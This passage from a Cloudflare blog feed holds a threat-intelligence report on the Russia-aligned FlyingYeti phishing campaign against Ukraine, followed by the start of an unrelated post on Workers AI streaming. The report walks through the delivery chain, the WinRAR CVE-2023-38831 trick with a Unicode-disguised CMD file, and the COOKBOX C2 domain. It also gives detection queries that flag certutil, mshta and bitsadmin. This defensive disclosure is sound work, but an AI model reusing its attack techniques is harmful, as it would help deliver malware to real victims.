            <dc:creator>James M Snell</dc:creator>
            <dc:creator>Igor Minar</dc:creator>
            <dc:creator>James Culveyhouse</dc:creator>
            <dc:creator>Mike Nomitch</dc:creator>
        </item>
        <item>
            <title><![CDATA[Disrupting FlyingYeti's campaign targeting Ukraine]]></title>
            <link>https://blog.cloudflare.com/disrupting-flyingyeti-campaign-targeting-ukraine/</link>
            <pubDate>Thu, 30 May 2024 13:00:38 GMT</pubDate>
            <description><![CDATA[ In April and May 2024, Cloudforce One employed proactive defense measures to successfully prevent Russia-aligned threat actor FlyingYeti from launching their latest phishing campaign targeting Ukraine ]]></description>
            <content:encoded><![CDATA[ <p></p><p>Cloudforce One is publishing the results of our investigation and real-time effort to detect, deny, degrade, disrupt, and delay threat activity by the Russia-aligned threat actor FlyingYeti during their latest phishing campaign targeting Ukraine. At the onset of Russia’s invasion of Ukraine on February 24, 2022, Ukraine introduced a moratorium on evictions and termination of utility services for unpaid debt. The moratorium ended in January 2024, resulting in significant debt liability and increased financial stress for Ukrainian citizens. The FlyingYeti campaign capitalized on anxiety over the potential loss of access to housing and utilities by enticing targets to open malicious files via debt-themed lures. If opened, the files would result in infection with the PowerShell malware known as <a href="https://cert.gov.ua/article/6277849?ref=news.risky.biz">COOKBOX</a>, allowing FlyingYeti to support follow-on objectives, such as installation of additional payloads and control over the victim’s system.</p><p>Since April 26, 2024, Cloudforce One has taken measures to prevent FlyingYeti from launching their phishing campaign – a campaign involving the use of Cloudflare Workers and GitHub, as well as exploitation of the WinRAR vulnerability <a href="https://nvd.nist.gov/vuln/detail/CVE-2023-38831">CVE-2023-38831</a>. Our countermeasures included internal actions, such as detections and code takedowns, as well as external collaboration with third parties to remove the actor’s cloud-hosted malware. Our effectiveness against this actor prolonged their operational timeline from days to weeks. For example, in a single instance, FlyingYeti spent almost eight hours debugging their code as a result of our mitigations. By employing proactive defense measures, we successfully stopped this determined threat actor from achieving their objectives.</p>
    <div>
      <h3>Executive Summary</h3>
      <a href="#executive-summary">
        
      </a>
    </div>
    <ul><li><p>On April 18, 2024, Cloudforce One detected the Russia-aligned threat actor FlyingYeti preparing to launch a phishing espionage campaign targeting individuals in Ukraine.</p></li><li><p>We discovered the actor used similar tactics, techniques, and procedures (TTPs) as those detailed in <a href="https://cert.gov.ua/article/6278620">Ukranian CERT's article on UAC-0149</a>, a threat group that has primarily <a href="https://cert.gov.ua/article/6277849?ref=news.risky.biz">targeted Ukrainian defense entities with COOKBOX malware since at least the fall of 2023</a>.</p></li><li><p>From mid-April to mid-May, we observed FlyingYeti conduct reconnaissance activity, create lure content for use in their phishing campaign, and develop various iterations of their malware. We assessed that the threat actor intended to launch their campaign in early May, likely following Orthodox Easter.</p></li><li><p>After several weeks of monitoring actor reconnaissance and weaponization activity (<a href="https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html">Cyber Kill Chain Stages 1 and 2</a>), we successfully disrupted FlyingYeti’s operation moments after the final COOKBOX payload was built.</p></li><li><p>The payload included an exploit for the WinRAR vulnerability CVE-2023-38831, which FlyingYeti will likely continue to use in their phishing campaigns to infect targets with malware.</p></li><li><p>We offer steps users can take to defend themselves against FlyingYeti phishing operations, and also provide recommendations, detections, and indicators of compromise.</p></li></ul>
    <div>
      <h2>Who is FlyingYeti?</h2>
      <a href="#who-is-flyingyeti">
        
      </a>
    </div>
    <p>FlyingYeti is the <a href="https://www.merriam-webster.com/dictionary/cryptonym">cryptonym</a> given by <a href="/introducing-cloudforce-one-threat-operations-and-threat-research">Cloudforce One</a> to the threat group behind this phishing campaign, which overlaps with UAC-0149 activity tracked by <a href="https://cert.gov.ua/">CERT-UA</a> in <a href="https://cert.gov.ua/article/6277849?ref=news.risky.biz">February</a> and <a href="https://cert.gov.ua/article/6278620">April</a> 2024. The threat actor uses dynamic DNS (<a href="https://www.cloudflare.com/learning/dns/glossary/dynamic-dns/">DDNS</a>) for their infrastructure and leverages cloud-based platforms for hosting malicious content and for malware command and control (C2). Our investigation of FlyingYeti TTPs suggests this is likely a Russia-aligned threat group. The actor appears to primarily focus on targeting Ukrainian military entities. Additionally, we observed Russian-language comments in FlyingYeti’s code, and the actor’s operational hours falling within the UTC+3 time zone.</p>
    <div>
      <h2>Campaign background</h2>
      <a href="#campaign-background">
        
      </a>
    </div>
    <p>In the days leading up to the start of the campaign, Cloudforce One observed FlyingYeti conducting reconnaissance on payment processes for Ukrainian communal housing and utility services:</p><ul><li><p>April 22, 2024 – research into changes made in 2016 that introduced the use of QR codes in payment notices</p></li><li><p>April 22, 2024 – research on current developments concerning housing and utility debt in Ukraine</p></li><li><p>April 25, 2024 – research on the legal basis for restructuring housing debt in Ukraine as well as debt involving utilities, such as gas and electricity</p></li></ul><p>Cloudforce One judges that the observed reconnaissance is likely due to the Ukrainian government’s payment moratorium introduced at the start of the full-fledged invasion in February 2022. Under this moratorium, outstanding debt would not lead to evictions or termination of provision of utility services. However, on January 9, 2024, the <a href="https://en.interfax.com.ua/news/economic/959388.html">government lifted this ban</a>, resulting in increased pressure on Ukrainian citizens with outstanding debt. FlyingYeti sought to capitalize on that pressure, leveraging debt restructuring and payment-related lures in an attempt to increase their chances of successfully targeting Ukrainian individuals.</p>
    <div>
      <h2>Analysis of the Komunalka-themed phishing site</h2>
      <a href="#analysis-of-the-komunalka-themed-phishing-site">
        
      </a>
    </div>
    <p>The disrupted phishing campaign would have directed FlyingYeti targets to an actor-controlled GitHub page at hxxps[:]//komunalka[.]github[.]io, which is a spoofed version of the Kyiv Komunalka communal housing site <a href="https://www.komunalka.ua">https://www.komunalka.ua</a>. Komunalka functions as a payment processor for residents in the Kyiv region and allows for payment of utilities, such as gas, electricity, telephone, and Internet. Additionally, users can pay other fees and fines, and even donate to Ukraine’s defense forces.</p><p>Based on past FlyingYeti operations, targets may be directed to the actor’s Github page via a link in a phishing email or an encrypted Signal message. If a target accesses the spoofed Komunalka platform at hxxps[:]//komunalka[.]github[.]io, the page displays a large green button with a prompt to download the document “Рахунок.docx” (“Invoice.docx”), as shown in Figure 1. This button masquerades as a link to an overdue payment invoice but actually results in the download of the malicious archive “Заборгованість по ЖКП.rar” (“Debt for housing and utility services.rar”).</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/22Rnm7YOnwnJocG98RMFDa/def10039081f7e9c6df15980a8b855ac/image4-5.png" />
            
            </figure><p>Figure 1: Prompt to download malicious archive “Заборгованість по ЖКП.rar”</p><p>A series of steps must take place for the download to successfully occur:</p><ul><li><p>The target clicks the green button on the actor’s GitHub page hxxps[:]//komunalka.github[.]io</p></li><li><p>The target’s device sends an HTTP POST request to the Cloudflare Worker worker-polished-union-f396[.]vqu89698[.]workers[.]dev with the HTTP request body set to “user=Iahhdr”</p></li><li><p>The Cloudflare Worker processes the request and evaluates the HTTP request body</p></li><li><p>If the request conditions are met, the Worker fetches the RAR file from hxxps[:]//raw[.]githubusercontent[.]com/kudoc8989/project/main/Заборгованість по ЖКП.rar, which is then downloaded on the target’s device</p></li></ul><p>Cloudforce One identified the infrastructure responsible for facilitating the download of the malicious RAR file and remediated the actor-associated Worker, preventing FlyingYeti from delivering its malicious tooling. In an effort to circumvent Cloudforce One's mitigation measures, FlyingYeti later changed their malware delivery method. Instead of the Workers domain fetching the malicious RAR file, it was loaded directly from GitHub.</p>
    <div>
      <h2>Analysis of the malicious RAR file</h2>
      <a href="#analysis-of-the-malicious-rar-file">
        
      </a>
    </div>
    <p>During remediation, Cloudforce One recovered the RAR file “Заборгованість по ЖКП.rar” and performed analysis of the malicious payload. The downloaded RAR archive contains multiple files, including a file with a name that contains the unicode character “U+201F”. This character appears as whitespace on Windows devices and can be used to “hide” file extensions by adding excessive whitespace between the filename and the file extension. As highlighted in blue in Figure 2, this cleverly named file within the RAR archive appears to be a PDF document but is actually a malicious CMD file (“Рахунок на оплату.pdf[unicode character U+201F].cmd”).</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/55Vjmg9VLEnAFv3RZQoZ2l/866016a2489f2a6c780c9f3971dd28ca/image2-11.png" />
            
            </figure><p>Figure 2: Files contained in the malicious RAR archive “Заборгованість по ЖКП.rar” (“Housing Debt.rar”)</p><p>FlyingYeti included a benign PDF in the archive with the same name as the CMD file but without the unicode character, “Рахунок на оплату.pdf” (“Invoice for payment.pdf”). Additionally, the directory name for the archive once decompressed also contained the name “Рахунок на оплату.pdf”. This overlap in names of the benign PDF and the directory allows the actor to exploit the WinRAR vulnerability <a href="https://nvd.nist.gov/vuln/detail/CVE-2023-38831">CVE-2023-38831</a>. More specifically, when an archive includes a benign file with the same name as the directory, the entire contents of the directory are opened by the WinRAR application, resulting in the execution of the malicious CMD. In other words, when the target believes they are opening the benign PDF “Рахунок на оплату.pdf”, the malicious CMD file is executed.</p><p>The CMD file contains the FlyingYeti PowerShell malware known as <a href="https://cert.gov.ua/article/6277849?ref=news.risky.biz">COOKBOX</a>. The malware is designed to persist on a host, serving as a foothold in the infected device. Once installed, this variant of COOKBOX will make requests to the DDNS domain postdock[.]serveftp[.]com for C2, awaiting PowerShell <a href="https://learn.microsoft.com/en-us/powershell/scripting/powershell-commands?view=powershell-7.4">cmdlets</a> that the malware will subsequently run.</p><p>Alongside COOKBOX, several decoy documents are opened, which contain hidden tracking links using the <a href="https://canarytokens.com/generate">Canary Tokens</a> service. The first document, shown in Figure 3 below, poses as an agreement under which debt for housing and utility services will be restructured.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/20vFV9kNTMmwxFXvpQoJTc/12542fb7a7d2108d49607f2a23fc7575/image5-10.png" />
            
            </figure><p>Figure 3: Decoy document Реструктуризація боргу за житлово комунальні послуги.docx</p><p>The second document (Figure 4) is a user agreement outlining the terms and conditions for the usage of the payment platform komunalka[.]ua.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1VHSTwqfrXWXvoryg8lOcE/68eb096bc82f18c7edcb4c88c1ed6d2c/image3-6.png" />
            
            </figure><p>Figure 4: Decoy document Угода користувача.docx <i>(User Agreement.docx)</i></p><p>The use of relevant decoy documents as part of the phishing and delivery activity are likely an effort by FlyingYeti operators to increase the appearance of legitimacy of their activities.</p><p>The phishing theme we identified in this campaign is likely one of many themes leveraged by this actor in a larger operation to target Ukrainian entities, in particular their defense forces. In fact, the threat activity we detailed in this blog uses many of the same techniques outlined in a <a href="https://cert.gov.ua/article/6278620">recent FlyingYeti campaign</a> disclosed by CERT-UA in mid-April 2024, where the actor leveraged United Nations-themed lures involving Peace Support Operations to target Ukraine’s military. Due to Cloudforce One’s defensive actions covered in the next section, this latest FlyingYeti campaign was prevented as of the time of publication.</p>
    <div>
      <h2>Mitigating FlyingYeti activity</h2>
      <a href="#mitigating-flyingyeti-activity">
        
      </a>
    </div>
    <p>Cloudforce One mitigated FlyingYeti’s campaign through a series of actions. Each action was taken to increase the actor’s cost of continuing their operations. When assessing which action to take and why, we carefully weighed the pros and cons in order to provide an effective active defense strategy against this actor. Our general goal was to increase the amount of time the threat actor spent trying to develop and weaponize their campaign.</p><p>We were able to successfully extend the timeline of the threat actor’s operations from hours to weeks. At each interdiction point, we assessed the impact of our mitigation to ensure the actor would spend more time attempting to launch their campaign. Our mitigation measures disrupted the actor’s activity, in one instance resulting in eight additional hours spent on debugging code.</p><p>Due to our proactive defense efforts, FlyingYeti operators adapted their tactics multiple times in their attempts to launch the campaign. The actor originally intended to have the Cloudflare Worker fetch the malicious RAR file from GitHub. After Cloudforce One interdiction of the Worker, the actor attempted to create additional Workers via a new account. In response, we disabled all Workers, leading the actor to load the RAR file directly from GitHub. Cloudforce One notified GitHub, resulting in the takedown of the RAR file, the GitHub project, and suspension of the account used to host the RAR file. In return, FlyingYeti began testing the option to host the RAR file on the file sharing sites <a href="https://pixeldrain.com/">pixeldrain</a> and <a href="https://www.filemail.com/">Filemail</a>, where we observed the actor alternating the link on the Komunalka phishing site between the following:</p><ul><li><p>hxxps://pixeldrain[.]com/api/file/ZAJxwFFX?download=one</p></li><li><p>hxxps://1014.filemail[.]com/api/file/get?filekey=e_8S1HEnM5Rzhy_jpN6nL-GF4UAP533VrXzgXjxH1GzbVQZvmpFzrFA&amp;pk_vid=a3d82455433c8ad11715865826cf18f6</p></li></ul><p>We notified GitHub of the actor’s evolving tactics, and in response GitHub removed the Komunalka phishing site. After analyzing the files hosted on pixeldrain and Filemail, we determined the actor uploaded dummy payloads, likely to monitor access to their phishing infrastructure (FileMail logs IP addresses, and both file hosting sites provide view and download counts). At the time of publication, we did not observe FlyingYeti upload the malicious RAR file to either file hosting site, nor did we identify the use of alternative phishing or malware delivery methods.</p><p>A timeline of FlyingYeti’s activity and our corresponding mitigations can be found below.</p>
    <div>
      <h3>Event timeline</h3>
      <a href="#event-timeline">
        
      </a>
    </div>
    
<div><table><colgroup>
<col></col>
<col></col>
</colgroup>
<thead>
  <tr>
    <th><span>Date</span></th>
    <th><span>Event Description</span></th>
  </tr></thead>
<tbody>
  <tr>
    <td><span>2024-04-18 12:18</span></td>
    <td><span>Threat Actor (TA) creates a Worker to handle requests from a phishing site</span></td>
  </tr>
  <tr>
    <td><span>2024-04-18 14:16</span></td>
    <td><span>TA creates phishing site komunalka[.]github[.]io on GitHub</span></td>
  </tr>
  <tr>
    <td><span>2024-04-25 12:25</span></td>
    <td><span>TA creates a GitHub repo to host a RAR file</span></td>
  </tr>
  <tr>
    <td><span>2024-04-26 07:46</span></td>
    <td><span>TA updates the first Worker to handle requests from users visiting komunalka[.]github[.]io</span></td>
  </tr>
  <tr>
    <td><span>2024-04-26 08:24</span></td>
    <td><span>TA uploads a benign test RAR to the GitHub repo</span></td>
  </tr>
  <tr>
    <td><span>2024-04-26 13:38</span></td>
    <td><span>Cloudforce One identifies a Worker receiving requests from users visiting komunalka[.]github[.]io, observes its use as a phishing page</span></td>
  </tr>
  <tr>
    <td><span>2024-04-26 13:46</span></td>
    <td><span>Cloudforce One identifies that the Worker fetches a RAR file from GitHub (the malicious RAR payload is not yet hosted on the site)</span></td>
  </tr>
  <tr>
    <td><span>2024-04-26 19:22</span></td>
    <td><span>Cloudforce One creates a detection to identify the Worker that fetches the RAR</span></td>
  </tr>
  <tr>
    <td><span>2024-04-26 21:13</span></td>
    <td><span>Cloudforce One deploys real-time monitoring of the RAR file on GitHub</span></td>
  </tr>
  <tr>
    <td><span>2024-05-02 06:35</span></td>
    <td><span>TA deploys a weaponized RAR (CVE-2023-38831) to GitHub with their COOKBOX malware packaged in the archive</span></td>
  </tr>
  <tr>
    <td><span>2024-05-06 10:03</span></td>
    <td><span>TA attempts to update the Worker with link to weaponized RAR, the Worker is immediately blocked</span></td>
  </tr>
  <tr>
    <td><span>2024-05-06 10:38</span></td>
    <td><span>TA creates a new Worker, the Worker is immediately blocked</span></td>
  </tr>
  <tr>
    <td><span>2024-05-06 11:04</span></td>
    <td><span>TA creates a new account (#2) on Cloudflare</span></td>
  </tr>
  <tr>
    <td><span>2024-05-06 11:06</span></td>
    <td><span>TA creates a new Worker on account #2 (blocked)</span></td>
  </tr>
  <tr>
    <td><span>2024-05-06 11:50</span></td>
    <td><span>TA creates a new Worker on account #2 (blocked)</span></td>
  </tr>
  <tr>
    <td><span>2024-05-06 12:22</span></td>
    <td><span>TA creates a new modified Worker on account #2</span></td>
  </tr>
  <tr>
    <td><span>2024-05-06 16:05</span></td>
    <td><span>Cloudforce One disables the running Worker on account #2</span></td>
  </tr>
  <tr>
    <td><span>2024-05-07 22:16</span></td>
    <td><span>TA notices the Worker is blocked, ceases all operations</span></td>
  </tr>
  <tr>
    <td><span>2024-05-07 22:18</span></td>
    <td><span>TA deletes original Worker first created to fetch the RAR file from the GitHub phishing page</span></td>
  </tr>
  <tr>
    <td><span>2024-05-09 19:28</span></td>
    <td><span>Cloudforce One adds phishing page komunalka[.]github[.]io to real-time monitoring</span></td>
  </tr>
  <tr>
    <td><span>2024-05-13 07:36</span></td>
    <td><span>TA updates the github.io phishing site to point directly to the GitHub RAR link</span></td>
  </tr>
  <tr>
    <td><span>2024-05-13 17:47</span></td>
    <td><span>Cloudforce One adds COOKBOX C2 postdock[.]serveftp[.]com to real-time monitoring for DNS resolution</span></td>
  </tr>
  <tr>
    <td><span>2024-05-14 00:04</span></td>
    <td><span>Cloudforce One notifies GitHub to take down the RAR file</span></td>
  </tr>
  <tr>
    <td><span>2024-05-15 09:00</span></td>
    <td><span>GitHub user, project, and link for RAR are no longer accessible</span></td>
  </tr>
  <tr>
    <td><span>2024-05-21 08:23</span></td>
    <td><span>TA updates Komunalka phishing site on github.io to link to pixeldrain URL for dummy payload (pixeldrain only tracks view and download counts)</span></td>
  </tr>
  <tr>
    <td><span>2024-05-21 08:25</span></td>
    <td><span>TA updates Komunalka phishing site to link to FileMail URL for dummy payload (FileMail tracks not only view and download counts, but also IP addresses)</span></td>
  </tr>
  <tr>
    <td><span>2024-05-21 12:21</span></td>
    <td><span>Cloudforce One downloads PixelDrain document to evaluate payload</span></td>
  </tr>
  <tr>
    <td><span>2024-05-21 12:47</span></td>
    <td><span>Cloudforce One downloads FileMail document to evaluate payload</span></td>
  </tr>
  <tr>
    <td><span>2024-05-29 23:59</span></td>
    <td><span>GitHub takes down Komunalka phishing site</span></td>
  </tr>
  <tr>
    <td><span>2024-05-30 13:00</span></td>
    <td><span>Cloudforce One publishes the results of this investigation</span></td>
  </tr>
</tbody></table></div>
    <div>
      <h2>Coordinating our FlyingYeti response</h2>
      <a href="#coordinating-our-flyingyeti-response">
        
      </a>
    </div>
    <p>Cloudforce One leveraged industry relationships to provide advanced warning and to mitigate the actor’s activity. To further protect the intended targets from this phishing threat, Cloudforce One notified and collaborated closely with GitHub’s Threat Intelligence and Trust and Safety Teams. We also notified CERT-UA and Cloudflare industry partners such as CrowdStrike, Mandiant/Google Threat Intelligence, and Microsoft Threat Intelligence.</p>
    <div>
      <h3>Hunting FlyingYeti operations</h3>
      <a href="#hunting-flyingyeti-operations">
        
      </a>
    </div>
    <p>There are several ways to hunt FlyingYeti in your environment. These include using PowerShell to hunt for WinRAR files, deploying Microsoft Sentinel analytics rules, and running Splunk scripts as detailed below. Note that these detections may identify activity related to this threat, but may also trigger unrelated threat activity.</p>
    <div>
      <h3>PowerShell hunting</h3>
      <a href="#powershell-hunting">
        
      </a>
    </div>
    <p>Consider running a PowerShell script such as <a href="https://github.com/IR-HuntGuardians/CVE-2023-38831-HUNT/blob/main/hunt-script.ps1">this one</a> in your environment to identify exploitation of CVE-2023-38831. This script will interrogate WinRAR files for evidence of the exploit.</p>
            <pre><code>CVE-2023-38831
Description:winrar exploit detection 
open suspios (.tar / .zip / .rar) and run this script to check it 

function winrar-exploit-detect(){
$targetExtensions = @(".cmd" , ".ps1" , ".bat")
$tempDir = [System.Environment]::GetEnvironmentVariable("TEMP")
$dirsToCheck = Get-ChildItem -Path $tempDir -Directory -Filter "Rar*"
foreach ($dir in $dirsToCheck) {
    $files = Get-ChildItem -Path $dir.FullName -File
    foreach ($file in $files) {
        $fileName = $file.Name
        $fileExtension = [System.IO.Path]::GetExtension($fileName)
        if ($targetExtensions -contains $fileExtension) {
            $fileWithoutExtension = [System.IO.Path]::GetFileNameWithoutExtension($fileName); $filename.TrimEnd() -replace '\.$'
            $cmdFileName = "$fileWithoutExtension"
            $secondFile = Join-Path -Path $dir.FullName -ChildPath $cmdFileName
            
            if (Test-Path $secondFile -PathType Leaf) {
                Write-Host "[!] Suspicious pair detected "
                Write-Host "[*]  Original File:$($secondFile)" -ForegroundColor Green 
                Write-Host "[*] Suspicious File:$($file.FullName)" -ForegroundColor Red

                # Read and display the content of the command file
                $cmdFileContent = Get-Content -Path $($file.FullName)
                Write-Host "[+] Command File Content:$cmdFileContent"
            }
        }
    }
}
}
winrar-exploit-detect</code></pre>
            
    <div>
      <h3></h3>
      <a href="#">
        
      </a>
    </div>
    <p>Microsoft Sentinel</p><p>In Microsoft Sentinel, consider deploying the rule provided below, which identifies WinRAR execution via cmd.exe. Results generated by this rule may be indicative of attack activity on the endpoint and should be analyzed.</p>
            <pre><code>DeviceProcessEvents
| where InitiatingProcessParentFileName has @"winrar.exe"
| where InitiatingProcessFileName has @"cmd.exe"
| project Timestamp, DeviceName, FileName, FolderPath, ProcessCommandLine, AccountName
| sort by Timestamp desc</code></pre>
            
    <div>
      <h3></h3>
      <a href="#">
        
      </a>
    </div>
    <p>Splunk</p><p>Consider using <a href="https://research.splunk.com/endpoint/d2f36034-37fa-4bd4-8801-26807c15540f/">this script</a> in your Splunk environment to look for WinRAR CVE-2023-38831 execution on your Microsoft endpoints. Results generated by this script may be indicative of attack activity on the endpoint and should be analyzed.</p>
            <pre><code>| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=winrar.exe `windows_shells` OR Processes.process_name IN ("certutil.exe","mshta.exe","bitsadmin.exe") by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id 
| `drop_dm_object_name(Processes)` 
| `security_content_ctime(firstTime)` 
| `security_content_ctime(lastTime)` 
| `winrar_spawning_shell_application_filter`</code></pre>
            
    <div>
      <h2>Cloudflare product detections</h2>
      <a href="#cloudflare-product-detections">
        
      </a>
    </div>
    
    <div>
      <h3>Cloudflare Email Security</h3>
      <a href="#cloudflare-email-security">
        
      </a>
    </div>
    <p>Cloudflare Email Security (CES) customers can identify FlyingYeti threat activity with the following detections.</p><ul><li><p>CVE-2023-38831</p></li><li><p>FLYINGYETI.COOKBOX</p></li><li><p>FLYINGYETI.COOKBOX.Launcher</p></li><li><p>FLYINGYETI.Rar</p></li></ul>
    <div>
      <h2>Recommendations</h2>
      <a href="#recommendations">
        
      </a>
    </div>
    <p>Cloudflare recommends taking the following steps to mitigate this type of activity:</p><ul><li><p>Implement Zero Trust architecture foundations:    </p></li><li><p>Deploy Cloud Email Security to ensure that email services are protected against phishing, BEC and other threats</p></li><li><p>Leverage browser isolation to separate messaging applications like LinkedIn, email, and Signal from your main network</p></li><li><p>Scan, monitor and/or enforce controls on specific or sensitive data moving through your network environment with data loss prevention policies</p></li><li><p>Ensure your systems have the latest WinRAR and Microsoft security updates installed</p></li><li><p>Consider preventing WinRAR files from entering your environment, both at your Cloud Email Security solution and your Internet Traffic Gateway</p></li><li><p>Run an Endpoint Detection and Response (EDR) tool such as CrowdStrike or Microsoft Defender for Endpoint to get visibility into binary execution on hosts</p></li><li><p>Search your environment for the FlyingYeti indicators of compromise (IOCs) shown below to identify potential actor activity within your network.</p></li></ul><p>If you’re looking to uncover additional Threat Intelligence insights for your organization or need bespoke Threat Intelligence information for an incident, consider engaging with Cloudforce One by contacting your Customer Success manager or filling out <a href="https://www.cloudflare.com/zero-trust/lp/cloudforce-one-threat-intel-subscription/">this form</a>.</p>
    <div>
      <h2>Indicators of Compromise</h2>
      <a href="#indicators-of-compromise">
        
      </a>
    </div>
    
<div><table><colgroup>
<col></col>
<col></col>
</colgroup>
<thead>
  <tr>
    <th><span>Domain / URL</span></th>
    <th><span>Description</span></th>
  </tr></thead>
<tbody>
  <tr>
    <td><span>komunalka[.]github[.]io</span></td>
    <td><span>Phishing page</span></td>
  </tr>
  <tr>
    <td><span>hxxps[:]//github[.]com/komunalka/komunalka[.]github[.]io</span></td>
    <td><span>Phishing page</span></td>
  </tr>
  <tr>
    <td><span>hxxps[:]//worker-polished-union-f396[.]vqu89698[.]workers[.]dev</span></td>
    <td><span>Worker that fetches malicious RAR file</span></td>
  </tr>
  <tr>
    <td><span>hxxps[:]//raw[.]githubusercontent[.]com/kudoc8989/project/main/Заборгованість по ЖКП.rar</span></td>
    <td><span>Delivery of malicious RAR file</span></td>
  </tr>
  <tr>
    <td><span>hxxps[:]//1014[.]filemail[.]com/api/file/get?filekey=e_8S1HEnM5Rzhy_jpN6nL-GF4UAP533VrXzgXjxH1GzbVQZvmpFzrFA&amp;pk_vid=a3d82455433c8ad11715865826cf18f6</span></td>
    <td><span>Dummy payload</span></td>
  </tr>
  <tr>
    <td><span>hxxps[:]//pixeldrain[.]com/api/file/ZAJxwFFX?download=</span></td>
    <td><span>Dummy payload</span></td>
  </tr>
  <tr>
    <td><span>hxxp[:]//canarytokens[.]com/stuff/tags/ni1cknk2yq3xfcw2al3efs37m/payments.js</span></td>
    <td><span>Tracking link</span></td>
  </tr>
  <tr>
    <td><span>hxxp[:]//canarytokens[.]com/stuff/terms/images/k22r2dnjrvjsme8680ojf5ccs/index.html</span></td>
    <td><span>Tracking link</span></td>
  </tr>
  <tr>
    <td><span>postdock[.]serveftp[.]com</span></td>
    <td><span>COOKBOX C2</span></td>
  </tr>
</tbody></table></div> ]]></content:encoded>
            <category><![CDATA[Cloud Email Security]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Cloudforce One]]></category>
            <category><![CDATA[CVE]]></category>
            <category><![CDATA[Exploit]]></category>
            <category><![CDATA[GitHub]]></category>
            <category><![CDATA[Intrusion Detection]]></category>
            <category><![CDATA[Malware]]></category>
            <category><![CDATA[Microsoft]]></category>
            <category><![CDATA[Phishing]]></category>
            <category><![CDATA[Remote Browser Isolation]]></category>
            <category><![CDATA[Russia]]></category>
            <category><![CDATA[Serverless]]></category>
            <category><![CDATA[Threat Data]]></category>
            <category><![CDATA[Threat Intelligence]]></category>
            <category><![CDATA[Threat Operations]]></category>
            <category><![CDATA[Ukraine]]></category>
            <category><![CDATA[Vulnerabilities]]></category>
            <guid isPermaLink="false">5JO10nXN3tLVG2C1EttkiH</guid>
            <dc:creator>Cloudforce One</dc:creator>
        </item>
        <item>
            <title><![CDATA[Streaming and longer context lengths for LLMs on Workers AI]]></title>
            <link>https://blog.cloudflare.com/workers-ai-streaming/</link>
            <pubDate>Tue, 14 Nov 2023 14:00:33 GMT</pubDate>
            <description><![CDATA[ Workers AI now supports streaming text responses for the LLM models in our catalog, including Llama-2, using server-sent events ]]></description>
            <content:encoded><![CDATA[ <p></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6hqH5G1qi0RIrmIsdkb1Ql/0d7746c5af2fe23d347ef7192d868b36/pasted-image-0--3--2.png" />
            
            </figure><p>Workers AI is our serverless GPU-powered inference platform running on top of Cloudflare’s global network. It provides a growing catalog of off-the-shelf models that run seamlessly with Workers and enable developers to build powerful and scalable AI applications in minutes. We’ve already seen developers doing amazing things with Workers AI, and we can’t wait to see what they do as we continue to expand the platform. To that end, today we’re excited to announce some of our most-requested new features: streaming responses for all <a href="https://www.cloudflare.com/learning/ai/what-is-large-language-model/">Large Language Models</a> (LLMs) on Workers AI, larger context and sequence windows, and a full-precision <a href="https://developers.cloudflare.com/workers-ai/models/llm/">Llama-2</a> model variant.</p><p>If you’ve used ChatGPT before, then you’re familiar with the benefits of response streaming, where responses flow in token by token. LLMs work internally by generating responses sequentially using a process of repeated inference — the full output of a LLM model is essentially a sequence of hundreds or thousands of individual prediction tasks. For this reason, while it only takes a few milliseconds to generate a single token, generating the full response takes longer, on the order of seconds. The good news is we can start displaying the response as soon as the first tokens are generated, and append each additional token until the response is complete. This yields a much better experience for the end user —  displaying text incrementally as it's generated not only provides instant responsiveness, but also gives the end-user time to read and interpret the text.</p><p>As of today, you can now use response streaming for any LLM model in our catalog, including the very popular <a href="https://developers.cloudflare.com/workers-ai/models/llm/">Llama-2 model</a>. Here’s how it works.</p>
    <div>
      <h3>Server-sent events: a little gem in the browser API</h3>
      <a href="#server-sent-events-a-little-gem-in-the-browser-api">
        
      </a>
    </div>
    <p><a href="https://developer.mozilla.org/en-US/docs/Web/API/Server-sent_events/Using_server-sent_events">Server-sent events</a> are easy to use, simple to implement on the server side, standardized, and broadly available across many platforms natively or as a polyfill. Server-sent events fill a niche of handling a stream of updates from the server, removing the need for the boilerplate code that would otherwise be necessary to handle the event stream.</p>
<table>
<thead>
  <tr>
    <th></th>
    <th><span>Easy-to-use</span></th>
    <th><span>Streaming</span></th>
    <th><span>Bidirectional</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><span>fetch</span></td>
    <td><span>✅</span></td>
    <td></td>
    <td></td>
  </tr>
  <tr>
    <td><span>Server-sent events</span></td>
    <td><span>✅</span></td>
    <td><span>✅</span></td>
    <td></td>
  </tr>
  <tr>
    <td><span>Websockets</span></td>
    <td></td>
    <td><span>✅</span></td>
    <td><span>✅</span></td>
  </tr>
</tbody>
</table><p><sup>Comparing fetch, server-sent events, and websockets</sup></p><p>To get started using streaming on Workers AI’s text generation models with server-sent events, set the “stream” parameter to true in the input of request. This will change the response format and <code>mime-type</code> to <code>text/event-stream</code>.</p><p>Here’s an example of using streaming with the <a href="https://developers.cloudflare.com/workers-ai/get-started/rest-api/">REST API</a>:</p>
            <pre><code>curl -X POST \
"https://api.cloudflare.com/client/v4/accounts/&lt;account&gt;/ai/run/@cf/meta/llama-2-7b-chat-int8" \
-H "Authorization: Bearer &lt;token&gt;" \
-H "Content-Type:application/json" \
-d '{ "prompt": "where is new york?", "stream": true }'

data: {"response":"New"}

data: {"response":" York"}

data: {"response":" is"}

data: {"response":" located"}

data: {"response":" in"}

data: {"response":" the"}

...

data: [DONE]</code></pre>
            <p>And here’s an example using a Worker script:</p>
            <pre><code>import { Ai } from "@cloudflare/ai";
export default {
    async fetch(request, env, ctx) {
        const ai = new Ai(env.AI, { sessionOptions: { ctx: ctx } });
        const stream = await ai.run(
            "@cf/meta/llama-2-7b-chat-int8",
            { prompt: "where is new york?", stream: true  }
        );
        return new Response(stream,
            { headers: { "content-type": "text/event-stream" } }
        );
    }
}</code></pre>
